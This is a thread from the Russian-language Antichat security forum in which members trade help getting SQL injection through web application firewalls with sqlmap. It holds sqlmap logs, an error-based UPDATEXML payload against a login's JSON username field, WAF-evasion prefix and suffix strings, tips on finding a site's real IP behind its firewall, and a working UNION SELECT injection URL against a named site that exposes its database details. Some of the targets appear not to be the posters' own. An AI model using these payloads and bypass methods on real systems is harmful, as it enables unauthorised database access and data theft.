HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1131  
Старый 08.10.2021, 12:55
brown
Guest
Сообщений: n/a
Провел на форуме:
43449

Репутация: 1
По умолчанию

Цитата:
Сообщение от msk_smail  
msk_smail said:

Код:
Code:
[06:15:40] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
попробуй в начале с этого + уже имеющиеся тамперы, в том числе на select. Указывай verbose 3 и смотри
не помогло(
 
Ответить с цитированием

  #1132  
Старый 08.10.2021, 13:05
msk_smail
Guest
Сообщений: n/a
Провел на форуме:
10377

Репутация: 0
По умолчанию

Цитата:
Сообщение от brown  
brown said:

не помогло(
можно использовать сразу связку из нескольких тамперов + используй --prefix="111'/*!40222" --suffix="*/!'"

если не помогает, то определи какая waf и попробуй найти как вариант реальный ip сайта

если и это не выходит то придется вручную писать тампер
 
Ответить с цитированием

  #1133  
Старый 08.10.2021, 19:13
Xsite
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
4776

Репутация: 0
По умолчанию

Цитата:
Сообщение от msk_smail  
msk_smail said:

можно использовать сразу связку из нескольких тамперов + используй --prefix="111'/*!40222" --suffix="*/!'"
если не помогает, то определи какая waf и попробуй найти как вариант реальный ip сайта
если и это не выходит то придется вручную писать тампер
можно разьеснительную бригаду по поводу префикс суффикс ?
 
Ответить с цитированием

  #1134  
Старый 12.10.2021, 12:36
brown
Guest
Сообщений: n/a
Провел на форуме:
43449

Репутация: 1
По умолчанию

[08:04:48] [WARNING] there is a possibility that the target (or WAF/IPS) is drop

ping 'suspicious' requests

Как можно обойти?

[08:04:48] [CRITICAL] connection timed out to the target URL. sqlmap is going to

retry the request(s)

[08:06:18] [CRITICAL] connection timed out to the target URL

[08:06:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to

retry the request(s)

[08:08:19] [CRITICAL] connection timed out to the target URL

[08:08:19] [INFO] URI parameter '#1*' appears to be 'OR boolean-based blind - WH

ERE or HAVING clause (NOT)' injectable (with --string="write")

[08:08:19] [WARNING] in OR boolean-based injection cases, please consider usage

of switch '--drop-set-cookie' if you experience any problems during data retriev

al

[08:08:19] [INFO] checking if the injection point on URI parameter '#1*' is a fa

lse positive

[08:08:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to

retry the request(s)

[08:10:19] [CRITICAL] connection timed out to the target URL

[08:10:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to

retry the request(s)

[08:12:19] [CRITICAL] connection timed out to the target URL

[08:12:19] [WARNING] false positive or unexploitable injection point detected

[08:12:19] [WARNING] URI parameter '#1*' does not seem to be injectable

ваф не дает прокрутить скулю
 
Ответить с цитированием

  #1135  
Старый 15.10.2021, 15:53
ex3x1
Guest
Сообщений: n/a
Провел на форуме:
1092

Репутация: 0
По умолчанию

Доброго дня! К примеру знаю что в БД есть строка с почтой admin@admin.com, но имя таблицы и колонки не знаю т.к. они имеют рандомные названия типа "dfdwydponefdxb". Как выполнить поиск по всей БД и найти в какой таблице есть запись с admin@admin.com?
 
Ответить с цитированием

  #1136  
Старый 30.12.2021, 22:55
sysjuk
Guest
Сообщений: n/a
Провел на форуме:
69527

Репутация: 5
По умолчанию

Доброго вечера, ребята. Актуальный вопрос, может есть готовый тампер под - Imunify360 (CloudLinux) waf, либо может взять что-то из готового и переписать?

Уж один сладкий вариант подвернулся))

Всех с наступающим Новым 2022 Годом.
 
Ответить с цитированием

  #1137  
Старый 01.03.2022, 13:22
brown
Guest
Сообщений: n/a
Провел на форуме:
43449

Репутация: 1
По умолчанию

Код:
Code:
Parameter: JSON #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (UPDATEXML)
    Payload: {"username":"test' AND UPDATEXML(7256,CONCAT(0x2e,0x716a7a7071,(SEL
ECT (ELT(7256=7256,1))),0x71627a7671),5155) AND 'kFiU'='kFiU","password":"test"}

    Vector: AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[D
ELIMITER_STOP]'),[RANDNUM1])
---
[12:20:48] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.34
back-end DBMS: MySQL >= 5.1
[12:20:48] [INFO] fetching database names
[12:20:48] [PAYLOAD] test' AND UPDATEXML(3717,CONCAT(0x2e,0x716a7a7071,(SELECT C
OUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA),0x71627a7671),8364) AND 'Bbs
S'='BbsS
[12:20:49] [WARNING] the SQL query provided does not return any output
[12:20:49] [INFO] falling back to current database
[12:20:49] [INFO] fetching current database
[12:20:49] [PAYLOAD] test' AND UPDATEXML(9975,CONCAT(0x2e,0x716a7a7071,(MID((DAT
ABASE()),1,22)),0x71627a7671),9057) AND 'rvrx'='rvrx
[12:20:49] [DEBUG] performed 1 query in 0.65 seconds
[12:20:49] [CRITICAL] unable to retrieve the database names
 
Ответить с цитированием

  #1138  
Старый 06.05.2022, 01:06
exe-world
Guest
Сообщений: n/a
Провел на форуме:
1291

Репутация: 0
По умолчанию

Ребят помогите как запихнуть в sqlmap

есть бага site.de/index.php?view_id=-11'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+

работает название бд выводит но sqlmap не видит что линк уязвим пробовал и темперы разные тупо 403 выводи в логе sqlmap

руками получается вывести version 10.2.43-MariaDB-cll-lve получается вывезти user
 
Ответить с цитированием

  #1139  
Старый 06.05.2022, 02:46
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от exe-world  
exe-world said:

Ребят помогите как запихнуть в sqlmap
есть бага site.de/index.php?view_id=-11'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+
работает название бд выводит но sqlmap не видит что линк уязвим пробовал и темперы разные тупо 403 выводи в логе sqlmap
руками получается вывести version 10.2.43-MariaDB-cll-lve получается вывезти user
очень похоже на модсекьюрити, надо тампер либо искать либо перепилить готовые, тут тема обхода /threads/425295/
 
Ответить с цитированием

  #1140  
Старый 06.05.2022, 11:13
eminlayer7788
Guest
Сообщений: n/a
Провел на форуме:
36807

Репутация: 1
По умолчанию

Цитата:
Сообщение от exe-world  
exe-world said:

Ребят помогите как запихнуть в sqlmap
есть бага site.de/index.php?view_id=-11'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+
работает название бд выводит но sqlmap не видит что линк уязвим пробовал и темперы разные тупо 403 выводи в логе sqlmap
руками получается вывести version 10.2.43-MariaDB-cll-lve получается вывезти user
what MYSQL version ?

https://medium.com/@drag0n/sqlmap-ta...s-c5a3f5764cb3
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ